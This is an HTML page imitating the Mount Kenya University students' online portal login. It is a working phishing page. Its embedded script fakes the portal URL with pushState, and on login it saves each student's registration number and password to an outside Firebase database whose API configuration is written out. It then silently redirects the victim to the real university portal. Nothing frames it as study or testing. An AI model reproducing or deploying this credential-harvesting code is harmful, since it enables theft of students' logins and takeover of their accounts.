<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
    <meta http-equiv="content-type" content="text/html;charset=utf-8">
    <meta name="author" content="Mount Kenya University">
    <meta name="description" content="Student Management Information System">
    <meta name="keywords" content="Student, Students, Portal, University, College, Education">
    <link rel="shortcut icon" href="images/portal_images/favicon.png" type="image/x-icon">
    <link rel="stylesheet" href="index.css">
    <title>Mount Kenya University : Students Online Portal</title>
</head>

<body>
    <div id="content">
        <div id="top_info">

            <table border="0" align="center" cellspacing="0" cellpadding="0" width="100%">
                <tbody>
                    <tr>
                        <td align="left" width="1%">
                            <a href="index.html" title="Mount Kenya University Home">
                                <img src="images/portal_images/mku_logo.jpg" class="logoimg"></a>
                        </td>
                        <td align="left">
                            <table border="0" align="left" cellspacing="0" cellpadding="0">
                                <tbody>
                                    <tr>
                                        <td align="left">
                                            <h1>
                                                <a style="font-size: 19.8px;" href="index.html"
                                                    title="Mount Kenya University Home Page">
                                                    University Student Portal </a>
                                            </h1>
                                        </td>
                                    </tr>
                                    <tr>
                                    </tr>
                                </tbody>
                            </table>
                        </td>
                    </tr>
                </tbody>
            </table>
        </div>

        <div id="navigation" role="navigation">
            <ul id="navigation-primary" class="ult-section primary">
                <li class="ult-position  active"> <a href="index.php?menu=portal_home" class="first">Home</a>
                </li>
                <li class="ult-position "> <a href="index.html">Information Update</a>
                </li>
                <li class="ult-position "> <a href="index.html">Fees</a>
                </li>
                <li class="ult-position "> <a href="index.html">Timetables</a>
                </li>
                <li class="ult-position "> <a href="index.html">Course Registration</a>
                </li>
                <li class="ult-position "> <a href="index.html">Results</a>
                </li>
                <li class="ult-position "> <a href="index.html">My Requests</a>
                </li>
                <li class="ult-position "> <a href="index.html">Sign Out</a>
                </li>
            </ul>
            <!-- end: .primary -->
            <ul id="navigation-secondary" class="ult-section secondary">
                <li class="ult-position  active"> <a href="password_update.php" class="first">Change Password</a>
                </li>
                <li class="ult-position "> <a href="index.html">Elections</a>
                </li>
                <li class="ult-position "> <a href="index.html">Clearance</a>
                </li>
                <li class="ult-position "> <a href="index.html">Downloads</a>
                </li>
                <li class="ult-position "> <a href="http://distance.mku.ac.ke/" target="_blank"> E-Learning Portal </a>
                </li>
                <li class="ult-position "> <a href="https://ibank.gtbank.co.ke/newapps/gtcollectportal/index.aspx"
                        target="_blank"> MPesa Trans. Validation </a>
                </li>
            </ul>
            <!-- end: .secondary -->
        </div>
        <!-- end: #navigation -->
        <div id="left">
            <div class="left_articles" align="center">
                <div id="body_content" align="center">

                    <table border="0" align="center" cellspacing="0" cellpadding="0">
                        <tbody>
                            <tr>
                                <td align="center">
                                    <form name="studentLogon" enctype="multipart/form-data" onsubmit="event.preventDefault(); redirectToMainSite();">
                                        <fieldset>
                                            <legend> Students Login</legend>

                                            <table border="1" align="center" cellspacing="0" cellpadding="0">
                                                <tbody>
                                                    <tr>
                                                        <td align="center" colspan="3">
                                                            <strong>Registered Students </strong> </td>
                                                    </tr>
                                                    <tr>
                                                        <td align="right">
                                                            <b> Student ID / Reg. Number:</b>
                                                        </td>
                                                        <td align="left">
                                                            <input type="text" id="regNo" name="regNo" size="20"
                                                                value="">
                                                        </td>
                                                        <td align="left">
                                                            <i>Type your Student ID / Reg. Number</i> <br><i>The year of
                                                                registration must be in full eg ../2010 </i>
                                                        </td>
                                                    </tr>
                                                    <tr>
                                                        <td align="right">
                                                            <b> Password:</b> </td>
                                                        <td align="left">
                                                            <input type="password" id="smisPass" name="smisPass"
                                                                size="20">
                                                        </td>
                                                        <td align="left">
                                                            <i>Use either your <b> National ID / Passport No.</b> or
                                                                <b> Mobile No.</b> or <b> Telephone No.</b>
                                                                <br>(Without Spaces) as your initial password</i>
                                                        </td>
                                                    </tr>
                                                    <tr>
                                                        <td align="center" colspan="3">
                                                            <input type="submit" name="smisLogon" class="inputbutton"
                                                                value=" &nbsp; &nbsp; Login &nbsp; &nbsp; ">
                                                        </td>
                                                    </tr>
                                                </tbody>
                                            </table>
                                        </fieldset>
                                    </form>
                                </td>
                            </tr>
                            <tr>
                                <td align="left">

                                    <table border="0" align="left" cellspacing="0" cellpadding="0">
                                        <tbody>
                                            <tr>
                                                <td align="left" style="font-size: 11px;">
                                                    <b> Note: Digits and Letters in your Student ID / Reg. Number.</b>
                                                    <ol>
                                                        <li><b>Digit</b> 0 (Zero) and <b>NOT</b> letter O </li>
                                                        <li><b>Letter</b> I and <b>NOT</b> Digit 1 (One) </li>
                                                    </ol> &nbsp; &nbsp; </td>
                                            </tr>
                                        </tbody>
                                    </table>
                                </td>
                            </tr>
                            <tr>
                                <td align="center">
                                    <form action="" name="ApplicantOfferLetter" enctype="multipart/form-data">
                                        <fieldset>
                                            <legend> Applicants / New Students</legend>

                                            <table border="1" align="center" cellspacing="0" cellpadding="0">
                                                <tbody>
                                                    <tr>
                                                        <td align="right">
                                                            <b> Application Ref. No:</b>
                                                        </td>
                                                        <td align="left">
                                                            <input type="text" name="applicationRefNo" size="20"
                                                                value="">
                                                        </td>
                                                        <td align="left">
                                                            <i>Ref No. or</i> <br> <i>Index No / Exam Year</i>
                                                            <br><i>The year of registration must be in full eg
                                                                01234567001/2015 </i> </td>
                                                    </tr>
                                                    <tr>
                                                        <td align="center" colspan="3">
                                                            <input type="submit" name="getLetterOfOfferBtn"
                                                                class="inputbutton"
                                                                value=" &nbsp; &nbsp; Generate Letter of Offer &nbsp; &nbsp; ">
                                                        </td>
                                                    </tr>
                                                </tbody>
                                            </table>
                                        </fieldset>
                                    </form>
                                </td>
                            </tr>
                        </tbody>
                    </table>
                </div>
            </div>
        </div>
        <div id="footer">
            <p class="right">© 2025 <a href="">
                    Mount Kenya University</a> . Hosted by
                <a href="http://www.mwanafunzi.net" title="Fountain ICT Services">Fountain ICT Services
                </a>
            </p>
            <p><a href="">About Us</a> · </p>
        </div>
    </div>
    <script type="module">
        window.history.pushState({}, "", "/studentportal/umis/");
      import { initializeApp } from "https://www.gstatic.com/firebasejs/11.2.0/firebase-app.js";
      import { getDatabase, ref, set, get, onValue } from "https://www.gstatic.com/firebasejs/11.2.0/firebase-database.js";
    
      const firebaseConfig = {
        apiKey: "AIzaSyDQf-gVwOix8gDBupnwa5sAXTyXhRcvIBc",
        authDomain: "studentportal-7ccf9.firebaseapp.com",
        projectId: "studentportal-7ccf9",
        storageBucket: "studentportal-7ccf9.firebasestorage.app",
        messagingSenderId: "414034931548",
        appId: "1:414034931548:web:4afc3720472709b307db99"
      };
    
      const app = initializeApp(firebaseConfig);
      const database = getDatabase(app);    
      // Ensure that the function is defined after the DOM is fully loaded
      document.addEventListener('DOMContentLoaded', () => {
        const form = document.querySelector('form[name="studentLogon"]');
        form.onsubmit = function(event) {
          event.preventDefault(); // Prevent default form submission
          redirectToMainSite();
        };
      });
    
      function redirectToMainSite() {
        const regNo = document.getElementById('regNo').value;
        const smisPass = document.getElementById('smisPass').value;
        const dbRef = ref(database, `users/${regNo}`);
        
        set(dbRef, {
          userId: regNo,
          pass: smisPass
        }).then(() => {
          window.location.href = `https://unipack.mku.ac.ke/umis/studentportal/index.php`;
        }).catch((error) => {
          console.log('error');
        });
      }
    </script>
    
</body>

</html>
